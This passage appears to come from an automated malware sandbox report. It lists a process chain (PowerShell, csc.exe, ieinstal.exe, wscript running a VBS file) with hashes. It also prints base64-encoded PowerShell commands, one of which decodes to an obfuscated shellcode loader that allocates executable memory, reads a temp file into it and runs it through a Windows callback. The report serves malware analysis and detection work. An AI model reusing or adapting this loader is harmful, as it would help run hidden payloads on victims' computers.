AHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 5172 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6856 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 8904 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • wscript.exe (PID: 2852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
          • powershell.exe (PID: 7456 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwBrAG4AaQBuACAASABPAFQARQBMAFYAUgBUACAAUwBrAGkAbgBuACAAYgBlAGQAcgBpAGYAdABlAG4AIABCAFIATwBLACAAZgBvAHIAcwBrAHUAZABzAGIAIABNAGkAcwBpACAAQQB1AG0AYQA2ACAATQBvAHMAcwBlAHIAbgBlAHMAIAANAAoAIwBIAGUAbQBpAGgAeQBwAGUAcgBpACAAQQBpAGsAbwBzACAAbQBhAGsAcgBvAGYAdQAgAHAAaQBsAGwAbQBhAGsAaQBuAGcAIABIAGEAYgBhAG4AZQByAGEAcwBkACAAVAByAG8AbAA2ACAAUgBZAEcAVABJAEsAQQBNAFAARQAgAFQAUgBGAEwARQBSAE4ARQBQAE8AIABtAG8AZABzAHQAYQBuAGQAcwAgAEQAeQBuAGEAbQBpACAAcAB1AGwAdgBpAG4AIABIAHkAcwB0AGUAcgBlAGMAdABvADEAIABNAHQAbgBpACAAYwBoAGEAcgB0ACAATABFAE0ATQBBAFQAQQBBAE4AIABLAG4AcwBrADYAIABmAGkAbABzAHQAcgB1AGsAdAAgAA0ACgAjAEsATwBFAFIAUwBMAEUAIABTAFQAWQBSAEUAVgBBAFIASQBBACAAQgBsAG4AZABlACAAUwBlAGQAaQBtADQAIABDAFIATwBTACAARABVAEUATABMAEUAUgBFACAAawByAHUAbQBtAGUAcwB1ACAAUABzAGUAdQBkAG8AcAAgAHMAaABlAHIAIABTAHQAYQBuAGQAaABhAGYAIABmAG8AcgB2AGUAIABTAGsAYQB0AHQAZQBhAGYAZABlACAAUgBFAFYARQBSAFMAQQAgAFQAUgBJAEwATABJAE8ATgBUAEEAIABQAHIAcgBpAGUAIABIAHYAaQBkACAARABhAG0AcgAxACAAVQBuAHMAdQA5ACAAcwBhAG4AagBhAHMAcABlAHcAIABmAGwAeQBkAGUAIABMAEkATgBHAFUATwBWAEUAUgBTACAAUgBlAHMAcABvADkAIAANAAoAIwB0AGkAbABmACAAUwBoAG8AdABnAHUAbgBhAGYANgAgAFoAdQBuAGkAcwBzADIAIABiAHIAZQByAGEAawAgAEMAQQBOAEMAQQBOAFIAIABNAGkAbgBjAGUAcwAxACAAVAByAGkAdABhAG4AMwAgAEwAQQBCAE8AIABLAGEAbQBtAGUAcgBtAHUAIABjAG8AdQBuAHQAZQByAHIAIABmAG8AbABrAGUAZAByACAAVABlAGwAZQB0AGUAawBuADYAIABJAG4AZABpACAAYQBmAHMAYQB2AGUAcgBoACAAaQBuAGQAYgAgAFAATABBAE4ASwAgAEkAbgB0AGkAOAAgAEkAbgBmAGkAbgBpADUAIABhAG0AbgBpACAAUABSAE8AWABJAE0ASQBUACAAbwB0AGEAcwByAGkAcwB0AG4AaQAgAG0AbwB1AGwAZABzAGEAdQAgAA0ACgAjAG8AcgBnAGEAbgBlAHQAbABhAHMAIABOAG8AbgBpACAAbgB5AHQAdAAgAG0AdQB0AHUAIAB0AGEAawBuACAATwBtAGsAcgBlAGQAcwBlAG4AIABNAEkATgBJAE0AVQBNAFQAUgAgAE8AdgBlAHIAdABqADIAIABTAHQAcgBlAGEAawAgAFMAYQBuAHMAIABCAGkAbwBtAGUAMwAgAGYAYQBpAHIAawBlACAARwBlAGIAcgBvAGsAbgA2ACAAQgBlAG4AYQBlAGcAdAAxACAAUwBDAEgARQBOAEsATAAgAFUARABMAEkAQwBJACAAQwB5AGQAaQBwAHAAaQBkADMAIABMAGEAbgBnAHQAdQByAHMAYwA1ACAAdQB0AHQAaABlAGQAZQByAHMAIABiAGwAbwBrAHAAbwBzAHQAbQAgAFEAdQBhAHIANQAgAGgAbwBtAGUAbwB0AGgAZQByACAAQQBjAGsAbABlAHkAYwBlADgAIABzAGEAbQBtAGUAbgBwAHIAZQAgAGUAbABhAHMAdABpAG4AcwBoAGEAIAANAAoAIwBGAFIAUwBUAEUARABJAFIAIABVAEQATQBBAFQAUgAgAEsAaQBkAGwAaQBrACAARABJAEEARwBOAE8AIABXAEkATQBQAEkATgBFAFMAIABCAHIAbwBhAGQAbABpAG4AZwBzACAAUwBrAGkAbgBrAGUAcgAgAFAAcgBvAHQAbwBnAGkAbgAzACAARQBNAFAASQBSAEkAUwAgAFMAawBlAGUANQAgAE0AQQBOAEQAQQAgAFMAUABJAE4AQQBUAEYAIABTAHAAZQBjAGsAbABpAG4AZwB6ADYAIAANAAoAIwBSAGEAYQBkADMAIABTAE8ATgBHAFcAUgBJAFQAIABBAG4AdABoAHIAbwBwAG8AIABUAEUATABFAEYATwBOAFMAIABBAE0ARQBOAEEATgAgAFMAbQBlAGwAIABTAHQAYQBsAGQAYgByAGQAcgAgAEYAWQBSAFYAUgBLAEUAUgBFAFMAIABTAG4AaQBwAGUAbgBiADYAIABTAGkAdAB1ADkAIABBAHUAZABpAGUAbgAyACAAUgBpAGsAbwBjAGgAZQB0ACAASQBuAGMAdQByAHMAbgB5ACAARgBvAHgAdABhAGkAbABzAGQAYQAgAEEASwBLAFIAIABBAGsAaQBtAGgAdQBzADYAIABJAG4AcwB1AHIAcgBlADMAIABCAG8AdAB0AGwAZQBjAGEAcAAgAEUAdQBvAG4AeQBtAGkAbgBkACAAcABhAHAAeQByAG8AZwAgAFAAZQBkAGkAIABNAG8AcABpAHMAaABuAGUAcwBzACAAQQBmAGYAZQBqAGUAbgBkAGUAcwA2ACAAQgBSAEkARwBHAEUATgBEACAAQgBhAHIAcwBlACAAVQBuAGQAZQByAGsAIABQAFIATwBEAEQARQAgAEoARQBOAEwAIAANAAoAIwBiAGUAbgBlAGwAIABkAGkAcABwAGUAcgAgAFIAYQBkAHoAIABqAGUAYgBsAGkAawBzAGEAZgB0ACAAdABlAGsAbgBvAGsAcgBhAHQAIABTAHcAaQBuACAATQBhAHIAbQBvAHIAIABNAGUAcgBlADEAIABTAGsAcgBrAHAAcgBvAHAAYQAgAEYAYQB0AHQAaQBnAGcAMwAgAHYAZQBhAGQAbwByAGUAbwB1ACAATgBPAE4AVgBBAFMAQwAgAHIAYQBuAGsAbABlACAAQgByAG4AZQAgAEMAbwBtAHAAIAANAAoAIwBNAGEAcwB0AGUAcgBsAGkAawBlACAAaABlAGwAaQBvAGwAbwBnAGkAIABEAG8AbABiAHkAcwB5ACAATgBFAEQARQAgAFAATwBSAFQASQBFACAAQQBuAGcAcwB0AHQAcgBzAGsAIABBAGsAdABpAG8AbgBzAGcAIABZAGQAZQByAHIANwAgAEUAVgBJAEcASABFAEQAUwBLACAAUwBQAEkATABEACAASQByAGkAdABpAGMAIABHAG4AYQB0AGgAbwBiAGQAZQAxACAAYgBsAGEAcgB0AGYAbwByAHMAIABSAGUAZgByAG4AcwA2ACAAbABlAGQAaQBnAGgAZQAgAEYAbwBkAGcAbgBnAGUAcgBuACAADQAKACMAUwBtAGUAbAB0AGUAbwBzACAARQBuAG8AcwBpAHMAZQBzACAAUwBQAEEATgBJAEUAUgAgAGEAZgB0AGUAcgB0AGEAeABhAG0AIABNAEUAWgBaAEEATgBJAE4ARQBUACAATABHAEQATwBNAE0ARQBSAEUAIABOAGUAZABzAGwAYQBnAGUAbgAgAG0AbwBsAGUAcAByAG8AIABiAG4AcwBrAHIAaQBmAHQAZQAgAEMAdQBzAGgAaQAgAFMAaABlAHQAbABhAG4AZABzAHAAIABEAGQAbgBpAG4AZwAgAEIAZQB0AHIAawBrAGUAMQAgAEcAbwBkAG4AYQB0ACAAQwBvAG4AdgBpAHYAaQBhADUAIABTAHAAaQByAGEAbAB0AGEAYQBnACAAcwBhAHgAYwBvAHIAbgBlAHQAIABCAGEAZwBlAHAAIABMAE8AVgBLAEEAVAAgAGEAaQByAGIAdQAgAE4AbgBzAG8AbQA0ACAAQgBsAG8AZABwAHIAbwBwADkAIABSAEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZAB0AGcAdAAgAFUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAA0ACAARQBLAFMAUABPAFMASQBUAEkATwAgAHMAdABhAG0AbQBlACAATQB5AHQAaABvAGwAbwA4ACAAVABIAFIATwBUAFQATABFAFIAIABWAGkAbgBkAHUAZQAgAFYAQQBTAEUAUgBIAFUAIABiAGwAbwBkAHMAawB1ACAAaABvAG0AbwBuAHkAbQB5AHUAIABVAFIAUwBLAE8AVgAgAFQAYQBhAGwAbQBvAGQAOAAgAFUASABJAE4ARAAgAFAAUgBPAEQAVQBLAFQASABBACAAVQBNAE8AUgBBAEwARQBOAEQASQAgAEYATwBSAE0AQQAgAEIAbABlAHMAYgA5ACAARwB5AHAAdABlAHIAZQBzAG8ANAAgAEQAYQB0AGEAYgAgAE4AbwByAG0AZQByAGkANwAgAEEAYwBjAGUAcwBzAGkAbwBuADUAIABIAEUATgBTAFkAIABhAG4AdABlAGcAbgBkACAAUABoAHIAZQBuADQAIABQAFIASQBNAEEAVABBAEwAIABOAG8AdABpAGMAZQBzAHMAdAA2ACAATQBPAEQARQBSAEwASQAgAGwAbQByAGsAZQByAHMAdQBsACAARgBJAE4ARwBFAFIAIAANAAoAIwBBAG4AdABpAGMAbwAgAFQAUgBPAEwARABFAFMASwBPACAATABPAFYATQBTAFMASQAgAE8AbQBsAGEAcwB0AG4AaQBuAGcANAAgAHYAYQB3AGEAbgB0AGkAZAB5AHMAIABrAG4AZQBiAGwAaQBuAGcAIABmAG8AcgBzAHQAcgBhAG4AZAAgAFQAaQBlAHQAaQBjAGsAbgBhAGEANgAgAGYAbABsAGUAcwBmAGEAZwBzACAAVABhAG4AZwBsAG8AIABTAHYAZQBuADIAIABQAHIAbwBqADQAIABDAE8AQwBLAFQAQQBJAEwAUwAgAFkAZQBsAGwAbwB3AHIAIAANAAoAIwBIAGEAbgBkAHMAIABTAFkARABTACAAUwBpAG4AaQBjAGkAMQAgAGMAZQBuAHQAIABkAG8AbQBuAGUAcwB0AHIAIABEAGUAbQBvACAAUwBDAFIASQAgAEMASABBAFIAQwBVACAAUwBvAG4AZwBmAHUANgAgAA0ACgAjAEIAQQBVAFMAIABTAFQAUgBBAEYARgAgAEQAdQB0AHQAbwBuAGsAcgBhAG4AIABMAEEASwBTACAAUwBjAHIAZQBlAG4AaQAgAFAAUgBPAEQAVQBLAFQASQBWACAAVwBhAGwAawBhAGIAbwB1AHQAbwAyACAAdABvAGcAdgBvAGcAbgB1ACAASQBuAGMAbwAyACAADQAKACMAYQBuAGsAcgAgAEcAcgB1AHAAcABlACAAYgBpAGwAbABlAHQAdAAgAFQAcgBvAGwAaQBnAHMAIABsAGEAbQBwAGUAcwBrAHIAbQAgAFMAQQBMAEcAUwBDAEgAQQBVAEYAIABCAEUAUwBWAEkATQBFAEIAQQAgAFMAcABlAGUAZABvAG0AZQB0ADcAIABBAEYARgBJACAAUwB5AGcAZQBoAGoAbABwADIAIABWAG8AawBzAGUAbgBkACAAQQBmAGgAbwBwAG4AMQAgAGMAbwBsAGUAYQBkAGUAcgBkACAASgBPAFQAVABJAE4AIABSAG8AdQBzAHQAZABvADcAIABmAG8AcgBzAHQAbwBrACAAdAByAGUAZABqAGUAdgBlACAAUwBwAG8AbABlAHIAZQByAGwAIABhAHIAYgBvAHUAcgBpAHMAIAANAAoAIwBLAGgAYQB0AHMAZgAgAEwASQBOAEQAQQBCAFIAIABCAE8AQwBDACAAVABpAG4AawB0AHUAcgBlAHIAMgAgAEIAZQB6AGEAbgB0AHkAdAA2ACAAZgBqAG8AcgAgAHUAZAB0AHIAeQBrAHMAbQBpAGQAIABzAGEAdQBiAGEAYgBsAGUAbgAgAHMAcABlAGUAZAAgAEQAbwBtAG0AZQBuADcAIAANAAoAIwBEAGkAcwBpAG4AOQAgAFAAUgBPAEwATwBOAEcARQBTAEMAIABBAGIAdABlADEAIABTAGEAbABpAGMAeQAzACAARABFAEkASwBTAEkAIABHAFkATgBHAEUAIAB0AGgAbABpAHAAcwBpAHMAcAAgAEMAaQBsAGkAbwBsACAAaQBuAGYAbwAgAFAAYQBsAGEAZQBvAHIAMwAgAEEAZgBmAGkAMwAgAE0ARQBMAE8AIABEAEkAQgBBAFMASQBDAEkAVABZACAASwBvAG4AYwBlAHIAMQAgAFAAbABvAHUAZwBoAHcAcgBpAGcAIABDAE8AUgBPAE4AQQBHACAAQQBmAHQAYQAgAFMAbwBpAGcAbgA1ACAAUwBuAGkAZgBmACAARABpAHMAZABvACAATABPAEMAUgAgAE0ARQBMAEwARQBNAE0AQQBEACAADQAKACMAUwB2AG8AdgBsADcAIAB1AGQAZwBpAGYAdABzACAATABpAG4AZABlAG4AcABhAGwAYQAxACAAdQBuAGQAZQAgAFUAbgBtAGkAcwAyACAAUwB0AGkAYwBrAGYAYQBzAHQAbgAgAGQAZQBzAHQAcgAgAFUAbgBzAGkAbgBlAHcAaQA2ACAAVwBvAG4AbgBpAG4AZwA5ACAATQBlAGwAbABlAG0AdABpAG4AIABzAGsAeQBkAGUAcgBpACAARwBBAEIARgBFAFMAVABTAFYASQAgAFQASQBMAEcAQQBBACAATwBwAGUAcgAgAEIAdQB0AGkAawBzAGcAYQAgAFQAdQBtAGwAaQBuAGcAIABNAG8AcgBhAG4AbgA0ACAAbwBwAHQAYQBsAHQAZQBzACAAaQBjAGsAZQAgAA0ACgAjAFMAdABhAGIAZQBqAHMAZQByACAAUwBQAFIASQBOACAAQQBtAGIAbAB5AGcAbwBuACAAcABvAHIAdAByAGUAcgBzACAATwByAGQAZABhAG4AbgBlACAAZgBvAG4AZABsACAAUwB0AGEAdAB1ACAARAByAGkAdgBoAGoAdQBsAGUAOAAgAGIAYQByAGIAZQB0ACAAVABSAEEAUABOAEUAIABzAHUAYgBjACAAUwB0AHIAZwBnAGEAcgBuACAARgBvAHIAbQAgAEYAUgBBAEcAQQAgAEQAUwBMAEUAUgAgAEUAUgBHAE8AUwBUAEEAIAANAAoAIwBjAG8AbgB2AGUAeQBhACAAcgBlAGMAaQByAGMAbABpAG4AZwAgAGIAYQBnAGYAbABpAGsAbgBpAG4AIABVAG4AcgBvAHUAbgBkAHMAbAAgAG4AYQBiAG8AYgBlAGIAIABCAG8AcgBlAHQAYQBhAHIAbgAgAFAAYQByAGEAbgBvAGkAZAAgAEEAZgBnAHIAZQBsAHMAZQBzAGYAIABOAG8AbgBjAGUAbABsAHUAbAA2ACAASwBvAHIAcgBlAGsAdABpACAAZAB1AG0AbQBlAHMAdABlACAAQQBnAHIAYQAgAEMATABJAE4ASQBDAFMAQQBHACAATQBpAGwAagAgAE0AYQBsAHQAbgBpACAATwBMAEYAQQBDAFQATwAgAEYAYQBnAGsAcgBpAHQAaQBrACAARgBhAHMAYQBuAGgAYQBuADkA